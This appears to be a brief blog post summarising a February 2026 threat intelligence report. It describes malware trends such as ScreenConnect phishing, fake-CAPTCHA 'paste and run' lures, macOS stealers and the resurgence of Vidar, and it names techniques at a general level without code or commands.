The February 2026 intelligence report identifies ScreenConnect as the most prevalent threat, frequently delivered via phishing lures ranging from social security documents to party invitations. A significant trend this month is the rise of "paste and run" techniques, utilized by threats such as ClearFake and Scarlet Goldfinch to trick users into executing malicious JavaScript or PowerShell code via fake CAPTCHA and browser update prompts.
MacOS-specific threats like Atomic Stealer and MacSync Stealer have reached record high rankings, employing sophisticated numeric obfuscation and native utilities like the 'ditto' command for data staging. Additionally, the Vidar infostealer has seen a resurgence following the takedown of other major C2 infrastructures, often leveraging 'mshta' for network proxying and initial execution chains.
Top comments (0)